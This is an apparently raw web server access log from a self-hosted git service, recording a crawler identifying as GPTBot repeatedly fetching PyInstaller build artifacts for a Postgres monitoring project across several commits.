"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23482] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599825] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23482] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23481] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15707] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599821] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15737] [Gzip 9.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14975] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23449] [Gzip 19.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14291] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14995] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14956] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10951] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13824] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13824] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14262] [Gzip 8.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10412] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10379] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16629] [Gzip 8.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599826] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16600] [Gzip 8.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14290] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14291] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599823] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 